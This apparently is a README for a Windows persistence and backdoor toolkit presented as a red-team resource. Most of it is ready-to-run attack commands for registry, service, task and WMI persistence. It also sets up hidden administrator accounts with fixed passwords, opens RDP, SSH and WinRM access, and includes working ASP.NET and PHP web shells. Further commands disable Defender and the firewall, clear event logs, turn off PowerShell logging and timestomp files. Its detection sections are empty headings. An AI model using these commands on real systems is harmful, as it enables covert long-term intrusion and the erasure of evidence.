๐ŸŽฏ Windows Persistence Toolkit

Advanced Windows persistence techniques and backdoor methodologies for authorized penetration testing, red team operations, and security research.

๐Ÿš€ Overview

This repository contains a comprehensive collection of Windows persistence techniques, backdoor methodologies, and stealth mechanisms designed for professional security assessments. The toolkit provides multiple vectors for maintaining access to Windows systems through various persistence mechanisms, from basic registry modifications to advanced WMI event subscriptions.

Key Features

๐Ÿ“‹ Table of Contents

โœจ Features

Persistence Mechanisms

Access Methods

Payload Formats

๐Ÿš€ Quick Start

Basic Registry Persistence

# Add persistence via Run key (system-wide)
      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "UpdateService" /t REG_SZ /d "C:\Windows\system32\backdoor.exe"

      # User-specific persistence
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "UserService" /t REG_SZ /d "C:\Users\Public\service.exe"
    

Service-Based Persistence

# Create Windows service
      sc create "WindowsUpdateService" binPath= "C:\Windows\system32\updater.exe" start= auto DisplayName= "Windows Update Service"

      # Start service
      sc start "WindowsUpdateService"
    

Scheduled Task Persistence

# Daily task
      schtasks /create /tn "SystemMaintenance" /tr "C:\Windows\maintenance.exe" /sc daily /st 14:30

      # Startup task
      schtasks /create /tn "StartupTask" /tr "C:\Windows\startup.exe" /sc onstart /ru SYSTEM
    

๐Ÿ” Persistence Techniques

1. Registry-Based Persistence

Run Keys (Most Common)

# System-wide (requires admin)
      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "UpdateService" /t REG_SZ /d "C:\Windows\system32\update.exe"

      # User-specific
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "UserService" /t REG_SZ /d "C:\Users\Public\service.exe"

      # RunOnce (executes once)
      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v "SystemCheck" /t REG_SZ /d "C:\temp\check.exe"
    

Advanced Registry Locations

# Winlogon Shell replacement
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "explorer.exe,C:\Windows\backdoor.exe"

      # Userinit modification  
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\Windows\backdoor.exe"

      # Image File Execution Options
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\Windows\backdoor.exe"
    

2. Scheduled Task Persistence

Time-Based Tasks

# Every 5 minutes
      schtasks /create /tn "SystemMonitor" /tr "C:\Windows\monitor.exe" /sc minute /mo 5 /ru SYSTEM

      # Daily at specific time
      schtasks /create /tn "DailyCheck" /tr "C:\Windows\check.exe" /sc daily /st 14:30

      # Weekly maintenance
      schtasks /create /tn "WeeklyMaintenance" /tr "C:\Windows\maintenance.exe" /sc weekly /d SUN /st 02:00
    

Event-Based Tasks

# On system startup
      schtasks /create /tn "StartupService" /tr "C:\Windows\startup.exe" /sc onstart /ru SYSTEM

      # On user logon
      schtasks /create /tn "LogonScript" /tr "C:\Windows\logon.exe" /sc onlogon

      # On system idle
      schtasks /create /tn "IdleTask" /tr "C:\Windows\idle.exe" /sc onidle /i 10
    

3. Windows Service Persistence

Service Creation

# Create new service
      sc create "SecurityHealthService" binPath= "C:\Windows\system32\security.exe" start= auto DisplayName= "Windows Security Health Service"

      # Set service description
      sc description "SecurityHealthService" "Monitors system security health and provides security updates"

      # Configure service failure actions
      sc failure "SecurityHealthService" reset= 86400 actions= restart/5000/restart/5000/restart/5000

      # Start service
      sc start "SecurityHealthService"
    

Service Modification

# Modify existing service
      sc config "Themes" binPath= "C:\Windows\system32\svchost.exe -k netsvcs -p -s Themes && C:\Windows\backdoor.exe"

      # Change service startup type
      sc config "SecurityHealthService" start= auto

      # Set service dependencies
      sc config "SecurityHealthService" depend= "RpcSs/RPCSS"
    

4. WMI Event Subscription

Event Filter Creation

# Create WMI event filter (triggers every 30 minutes)
      wmic /namespace:\\root\subscription PATH __EventFilter CREATE Name="SystemPerformanceFilter", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 1800 WHERE TargetInstance ISA 'Win32_PerfRawData_PerfOS_System'"
    

Event Consumer Creation

# Create command line event consumer
      wmic /namespace:\\root\subscription PATH CommandLineEventConsumer CREATE Name="SystemPerformanceConsumer", CommandLineTemplate="C:\Windows\system32\performance.exe"
    

Filter-Consumer Binding

# Bind filter to consumer
      wmic /namespace:\\root\subscription PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"SystemPerformanceFilter\"", Consumer="CommandLineEventConsumer.Name=\"SystemPerformanceConsumer\""
    

5. Startup Folder Persistence

System-Wide Startup

# All users startup folder
      copy "backdoor.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SystemUpdate.exe"

      # Alternative system startup location
      copy "backdoor.exe" "C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup\startup.exe"
    

User-Specific Startup

# Current user startup
      copy "backdoor.exe" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\UserUpdate.exe"

      # Specific user startup
      copy "backdoor.exe" "C:\Users\TargetUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\service.exe"
    

๐Ÿšช Backdoor Methods

1. RDP Backdoor Setup

User Account Creation

# Create hidden admin user
      net user /add backdoor P@ssw0rd123!
      net localgroup administrators backdoor /add

      # Hide from login screen
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v backdoor /t REG_DWORD /d 0

      # Set password never expires
      wmic useraccount where "name='backdoor'" set PasswordExpires=FALSE
    

RDP Configuration

# Enable Remote Desktop
      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

      # Enable RDP through Windows Firewall
      netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

      # Start Terminal Service
      net start TermService

      # Set RDP port (optional)
      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389
    

2. SSH Backdoor (Windows 10+)

OpenSSH Installation

# Install OpenSSH Server
      Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0

      # Start SSH service
      Start-Service sshd

      # Set service to automatic
      Set-Service -Name sshd -StartupType 'Automatic'

      # Configure firewall
      New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22
    

SSH Key Configuration

# Create SSH directory
      New-Item -Type Directory -Path "C:\Users\backdoor\.ssh"

      # Add authorized key
      Set-Content -Path "C:\Users\backdoor\.ssh\authorized_keys" -Value "ssh-rsa AAAAB3Nza... your-public-key"

      # Set proper permissions
      icacls "C:\Users\backdoor\.ssh\authorized_keys" /inheritance:r /grant "backdoor:F"
    

3. WinRM Backdoor

WinRM Configuration

# Enable WinRM
      winrm quickconfig -q

      # Configure WinRM for unencrypted traffic
      winrm set winrm/config/service @{AllowUnencrypted="true"}

      # Set authentication methods
      winrm set winrm/config/service/auth @{Basic="true"}

      # Add user to Remote Management group
      net localgroup "Remote Management Users" backdoor /add
    

PowerShell Remoting

# Enable PowerShell remoting
      Enable-PSRemoting -Force

      # Set execution policy
      Set-ExecutionPolicy RemoteSigned -Force

      # Configure trusted hosts (if needed)
      Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" -Force
    

4. Web Shell Backdoor

ASP.NET Web Shell

<%@ Page Language="C#" %>
      <%@ Import Namespace="System.Diagnostics" %>
      <script runat="server">
      void Page_Load(object sender, EventArgs e) {
          string cmd = Request.QueryString["cmd"];
          if (!string.IsNullOrEmpty(cmd)) {
              Process proc = new Process();
              proc.StartInfo.FileName = "cmd.exe";
              proc.StartInfo.Arguments = "/c " + cmd;
              proc.StartInfo.UseShellExecute = false;
              proc.StartInfo.RedirectStandardOutput = true;
              proc.Start();
              Response.Write("<pre>" + proc.StandardOutput.ReadToEnd() + "</pre>");
              proc.Close();
          }
      }
      </script>
    

PHP Web Shell

<?php
      if(isset($_GET['cmd'])) {
      $cmd = $_GET['cmd'];
      echo "<pre>";
      system($cmd);
      echo "</pre>";
      }
      ?>
    

๐Ÿ›ก๏ธ Detection Evasion

Anti-Virus Evasion

File Attribute Manipulation

# Hide files
      attrib +h +s C:\Windows\system32\backdoor.exe

      # Set system timestamps
      powershell "(Get-Item 'C:\Windows\system32\backdoor.exe').CreationTime = (Get-Item 'C:\Windows\system32\explorer.exe').CreationTime"
      powershell "(Get-Item 'C:\Windows\system32\backdoor.exe').LastWriteTime = (Get-Item 'C:\Windows\system32\explorer.exe').LastWriteTime"
    

Security Software Bypass

# Disable Windows Defender (requires admin)
      powershell "Set-MpPreference -DisableRealtimeMonitoring $true"
      powershell "Add-MpPreference -ExclusionPath C:\Windows\system32"
      powershell "Add-MpPreference -ExclusionExtension .exe"

      # Disable Windows Firewall
      netsh advfirewall set allprofiles state off
    

Log Evasion

Event Log Clearing

# Clear specific event logs
      wevtutil cl Security
      wevtutil cl System
      wevtutil cl Application
      wevtutil cl "Windows PowerShell"

      # Clear all event logs
      for /f "tokens=1" %i in ('wevtutil el') do wevtutil cl "%i"
    

PowerShell Logging Bypass

# Disable PowerShell logging
      Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 0
      Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" -Name "EnableTranscripting" -Value 0
    

Process Hiding

Service Masquerading

# Run as legitimate service
      sc create "WindowsSecurityHealthService" binPath= "C:\Windows\system32\svchost.exe -k SecurityHealth -p -s SecurityHealthService"
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\system32\backdoor.dll"
    

DLL Hijacking

# Replace legitimate DLL
      copy "malicious.dll" "C:\Windows\system32\version.dll"
      copy "malicious.dll" "C:\Program Files\Application\missing.dll"
    

๐Ÿ’ก Usage Examples

Complete RDP Backdoor Setup

# Create backdoor user
      net user /add support P@ssw0rd2024!
      net localgroup administrators support /add
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v support /t REG_DWORD /d 0

      # Enable RDP
      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
      netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
      net start TermService

      # Connect: rdesktop -u support -p 'P@ssw0rd2024!' target-ip
    

Registry + Service Persistence Combo

# Registry persistence
      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SystemService" /t REG_SZ /d "C:\Windows\system32\service.exe"

      # Service persistence
      sc create "SystemService" binPath= "C:\Windows\system32\service.exe" start= auto DisplayName= "System Service"
      sc start "SystemService"

      # Scheduled task backup
      schtasks /create /tn "SystemService" /tr "C:\Windows\system32\service.exe" /sc onstart /ru SYSTEM
    

WMI Stealth Persistence

# Create WMI event subscription for stealth persistence
      wmic /namespace:\\root\subscription PATH __EventFilter CREATE Name="SecurityUpdate", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfRawData_PerfOS_System'"

      wmic /namespace:\\root\subscription PATH CommandLineEventConsumer CREATE Name="SecurityConsumer", CommandLineTemplate="C:\Windows\system32\SecurityUpdate.exe"

      wmic /namespace:\\root\subscription PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"SecurityUpdate\"", Consumer="CommandLineEventConsumer.Name=\"SecurityConsumer\""
    

๐Ÿงน Cleanup Procedures

Registry Cleanup

# Remove Run keys
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "UpdateService" /f
      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "UserService" /f

      # Restore Winlogon settings
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "explorer.exe" /f
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t REG_SZ /d "C:\Windows\system32\userinit.exe," /f
    

Service Cleanup

# Stop and remove services
      sc stop "SecurityHealthService"
      sc delete "SecurityHealthService"

      # Remove service registry entries
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
    

Task Cleanup

# Remove scheduled tasks
      schtasks /delete /tn "SystemMonitor" /f
      schtasks /delete /tn "DailyCheck" /f
      schtasks /delete /tn "StartupService" /f
    

WMI Cleanup

# Remove WMI subscriptions
      wmic /namespace:\\root\subscription PATH __FilterToConsumerBinding WHERE "Filter=\"__EventFilter.Name='SystemPerformanceFilter'\"" DELETE
      wmic /namespace:\\root\subscription PATH CommandLineEventConsumer WHERE "Name='SystemPerformanceConsumer'" DELETE
      wmic /namespace:\\root\subscription PATH __EventFilter WHERE "Name='SystemPerformanceFilter'" DELETE
    

File Cleanup

# Remove backdoor files
      del "C:\Windows\system32\backdoor.exe"
      del "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SystemUpdate.exe"
      del "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\UserUpdate.exe"

      # Remove backdoor users
      net user backdoor /delete
      net user support /delete
    

๐Ÿ” Detection and Forensics

Common Detection Methods

Forensic Artifacts

IMPORTANT: This toolkit is designed for authorized penetration testing, security research, and educational purposes only.

Authorized Use

Prohibited Use

Responsibility

The authors and contributors are not responsible for any misuse of this toolkit. Users are solely responsible for ensuring their activities are legal and authorized.

๐Ÿ“š Educational Resources

Learning Objectives

๐Ÿค Contributing

We welcome contributions from the security community!

How to Contribute

  1. Fork the repository
  2. Create a feature branch (git checkout -b feature/new-technique)
  3. Commit your changes (git commit -am 'Add new persistence technique')
  4. Push to the branch (git push origin feature/new-technique)
  5. Create a Pull Request

Contribution Guidelines

What We're Looking For

๐Ÿ“ž Support

Getting Help

Community

๐Ÿ† Acknowledgments

Special thanks to the security research community, penetration testers, and red team professionals who continuously advance the field of offensive security and help organizations improve their defensive capabilities.


โš ๏ธ Remember: Use responsibly, ethically, and legally. Always obtain proper authorization before testing.

๐Ÿ”’ Security Research Disclaimer: This toolkit is intended to help security professionals identify and remediate persistence techniques in their environments. It should only be used in authorized testing scenarios.